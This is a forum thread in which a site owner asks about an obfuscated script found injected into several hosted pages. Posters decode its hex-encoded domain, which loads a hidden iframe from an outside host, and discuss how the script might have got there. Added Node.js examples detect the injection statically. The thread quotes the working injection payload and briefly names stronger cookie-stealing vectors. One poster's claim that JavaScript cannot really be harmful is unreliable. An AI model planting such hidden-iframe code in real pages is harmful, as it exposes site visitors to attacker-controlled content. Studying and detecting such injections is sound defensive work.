  • #1
    Regular Coder logictrap's Avatar

    Suspicious Code found in web page

    I have sites on a shared hosting service and found the following code on a page which is very suspicious to me. At first it looks like google stuff but it looks strange to me.

    Can someone let me know if this is some type of harmful code:

    Code:
    <script type='text/javascript'>var str='google-analytics.com';var str2='6b756c6b61726e696f6f37312e636f6d';str4='php';var str3='if';str='';for(var i=0;i<str2.length;i=i+2){str=str+'%'+str2.substr(i,2);}str=unescape(str);document.write('<'+str3+'rame width=1 height=1 src="http://'+str+'/index.'+str4+'?id=210" style="visibility: hidden;"></'+str3+'rame>');</script>

    Which came first - the chicken or the egg? The egg... [ticket closed]
    If a tree falls... does it make a sound? Yes.............. [ticket closed]

  • #2
    Supreme Master coder! Philip M's Avatar
    This translates to the address:

    http://www.kulkarnioo71.com/index.php?id=210

    I have no idea what this does, and I don't plan to find out, but you can be sure it is bad news. Delete it. Then report it to your host and take steps to prevent it from coming back.


    "I cannot conceive that anybody will require multiplications at the rate of 40,000 or even 4,000 per hour ..." -- F. H. Wales (1936)
    Last edited by Philip M; 01-15-2009 at 05:36 PM.
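
Added example, not part of the original thread: the decoding step Philip M describes can be done statically in Node.js, without loading the page or running the script. `SAMPLE` is the script body from post #1; the function names are hypothetical.

```javascript
// Added example: decode hex-encoded string literals in an injected script
// without executing it. SAMPLE is the script body quoted in post #1.
const SAMPLE = `var str='google-analytics.com';var str2='6b756c6b61726e696f6f37312e636f6d';str4='php';var str3='if';str='';for(var i=0;i<str2.length;i=i+2){str=str+'%'+str2.substr(i,2);}str=unescape(str);document.write('<'+str3+'rame width=1 height=1 src="http://'+str+'/index.'+str4+'?id=210" style="visibility: hidden;"></'+str3+'rame>');`;

// Return every quoted literal that is an even-length run of hex digits
// (at least 4 bytes) and decodes to printable ASCII.
function decodeHexLiterals(source) {
  const findings = [];
  const literal = /(['"])((?:[0-9a-fA-F]{2}){4,})\1/g;
  let m;
  while ((m = literal.exec(source)) !== null) {
    const bytes = m[2].match(/../g).map((h) => parseInt(h, 16));
    if (bytes.every((b) => b >= 0x20 && b <= 0x7e)) {
      findings.push({ hex: m[2], text: String.fromCharCode(...bytes) });
    }
  }
  return findings;
}

// Collect the other tell-tales visible in this sample.
function describeScript(source) {
  return {
    decoded: decodeHexLiterals(source),
    usesDocumentWrite: /document\.write\s*\(/.test(source),
    usesUnescape: /\bunescape\s*\(/.test(source),
    // A 1x1 frame that is also hidden has no legitimate display purpose.
    hiddenFrame: /width=1\s+height=1/i.test(source) &&
      /visibility:\s*hidden/i.test(source),
    // 'google-analytics.com' is assigned to str, then str is reset to '':
    // the familiar name is a decoy and never reaches the output.
    decoyOverwritten:
      /var\s+str\s*=\s*'[^']+';[\s\S]*?\bstr\s*=\s*'';/.test(source),
  };
}

console.log(describeScript(SAMPLE));
```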

  • #3
    Senior Coder rnd me's Avatar
    i don't think javascript can be really harmful, just annoying.
    after all, javascript can be turned off with a click or two...
    your app should not be programmed in a way that compromises user information, even if attacked. an attacker can't steal what he doesn't have.

    this is a poor attempt at an XSS attack, script kiddie type material.
    all it can really do is count hits.


    Code:
    <iframe width=1 height=1 src="http://kulkarnioo71.com/index.php?id=210" style="visibility: hidden;"></iframe>
    it would be a much better attack to use something like an <a ping="xss">, an img ping, remote script tag etc. that way, the attacker could steal cookies.

    this one is pretty lame, and will click in IE, making even non-developers suspicious.
    the outside domain of the iframe prevents juicier interaction between remote host and your page.

    sounds like you need to not republish anonymously submitted content without sanitizing it.
    my site (updated 2014/10/20)
    BROWSER STATS [% share] (2014/9/03) IE7:0.1, IE8:4.3, IE11:9.2, IE9:2.7, IE10:2.6, FF:16.8, CH:47.5, SF:7.8, NON-MOUSE:37%

  • #4
    Regular Coder logictrap's Avatar
    Thanks - I was afraid of that.

    I'm confused how this was able to be inserted into these files as they are not files that display any user contributed data.

    If I ran a php script to add code it would not work because the files do not have write permission.

    Where do I start?


  • #5
    Senior Coder rnd me's Avatar
    perhaps it's part of the user agreement for your hosting; just a guess based on the fact that it's not malicious.

    you could post the code, or provide a link and i can give it a look.
    it's impossible to say "how it got there" without knowing what "there" is.

    EDIT: I guess you can PM me the link if you don't want the whole world seeing it...

  • #6
    Supreme Master coder! Philip M's Avatar
    rnd me -

    For my edification, could you please explain how you are so sure that this code is not malicious - by which I take it you mean incapable of causing damage? Someone has gone to some trouble to insert/inject it.


    I'm not paranoid! Which of my enemies told you this?
    Last edited by Philip M; 01-15-2009 at 07:38 PM.

  • #7
    Regular Coder logictrap's Avatar
    rnd me - thanks for the offer. Is it possible you could tell me what you would do to find out more info? I'd like to learn this myself so I can be more self reliant.

    Thanks.


  • #8
    Senior Coder rnd me's Avatar
    Quote (originally posted by Philip M):
    rnd me -

    For my edification, could you please explain how you are so sure that this code is not malicious - by which I take it you mean incapable of causing damage? Someone has gone to some trouble to insert/inject it.

    sure.

    it's the most benign type of xss attack.
    1. code size itself does not leave much room to attack.
    2. it does not replicate itself like the newer ones do.
    3. it's not a player in launching ddos attacks.
    4. it doesn't steal cookies, variables, form inputs, or even the queryString.
    5. its use of an iframe sequesters any malicious code on the remote attack host to its own domain, rendering the compromised page unreachable by attack code.

    i am by no means saying "ignore it, it doesn't matter", quite the opposite.
    i just mean that it's more like a cold than AIDS.

    However, it's a warning shot across the bow of your server.
    If someone can sneak this in, they can almost assuredly inject something a lot worse as well.

    "This?, this is nothing"

    it's unwelcome, but its behavior is not dangerous.




    @logictrap-
    i am not sure i can really explain everything i would do.
    It's kinda like asking a dentist to walk you through a DIY root canal over the phone.

    Without looking at anything, i don't know if it's an html, php, or a javascript page that contains the attack. I don't know if any forms are in use. I can point out and expand on anything i see, but there's a cornucopia of vectors for this sort of thing.


    finding out how it got there would require examining/collecting evidence, of which i have seen none.


    i would check out the xss cheatsheet if i were you; it will show you how to sniff out attacks. you can read up about xss from several good top10 google "xss" hits.

  • #9
    Regular Coder logictrap's Avatar
    It looks like a script was run that looks for a file named index.html and adds the code right after the <body> tag.

    There are several index.html files that were affected and based on the time stamp of the files it appears to have been done by a script as the times are too close together to have been done manually.

    As I said before a simple php script on the site would not have the permissions to overwrite these files as the permissions for the files don't allow this, but then maybe I don't know php as well as I should.

    Any ideas?

    Which came first - the chicken or the egg? The egg... [ticket closed]
    If a tree falls... does it make a sound? Yes.............. [ticket closed]
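
Added example, not part of the original thread: a Node.js triage pass for the two observations in post #9, a script placed directly after the `<body>` tag and modification times too close together to be manual. The file records, the stand-in script and the 5-second window are constructed assumptions.

```javascript
// Constructed stand-in for the injected block; not the real payload.
const INJECTED = "<script>document.write('constructed stand-in');</script>";

// Constructed sample records: path, modification time, file content.
const FILES = [
  { path: 'site-a/index.html', mtime: '2009-01-14T02:10:03Z',
    html: `<html><body>${INJECTED}<h1>A</h1></body></html>` },
  { path: 'site-b/index.html', mtime: '2009-01-14T02:10:03Z',
    html: `<html><body class="home">\n${INJECTED}<p>B</p></body></html>` },
  { path: 'blog/index.html', mtime: '2009-01-14T02:10:04Z',
    html: `<html><body>${INJECTED}<p>C</p></body></html>` },
  { path: 'about/index.html', mtime: '2008-11-02T16:45:00Z',
    html: '<html><head><script src="menu.js"></script></head><body><p>D</p></body></html>' },
];

// Return the body of a script that directly follows <body> and calls
// document.write, or null when the page does not match that pattern.
function injectedScript(html) {
  const m = /<body[^>]*>\s*<script\b[^>]*>([\s\S]*?)<\/script>/i.exec(html);
  return m && /document\.write\s*\(/.test(m[1]) ? m[1] : null;
}

// Group records whose consecutive mtimes are at most windowMs apart;
// only groups of two or more files count as a burst.
function findBursts(records, windowMs) {
  const sorted = [...records].sort(
    (a, b) => Date.parse(a.mtime) - Date.parse(b.mtime));
  const bursts = [];
  let current = [];
  for (const rec of sorted) {
    const prev = current[current.length - 1];
    if (prev && Date.parse(rec.mtime) - Date.parse(prev.mtime) > windowMs) {
      if (current.length > 1) bursts.push(current.map((r) => r.path));
      current = [];
    }
    current.push(rec);
  }
  if (current.length > 1) bursts.push(current.map((r) => r.path));
  return bursts;
}

function triage(files, windowMs = 5000) {
  const suspects = files.filter((f) => injectedScript(f.html) !== null);
  return { suspects: suspects.map((f) => f.path),
           bursts: findBursts(suspects, windowMs) };
}

console.log(JSON.stringify(triage(FILES), null, 2));
```

The burst timestamp is the window to look up in the host's FTP and HTTP access logs, since a file that the web-server user cannot write was most likely changed through the account's own credentials or by another process with access to the files.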

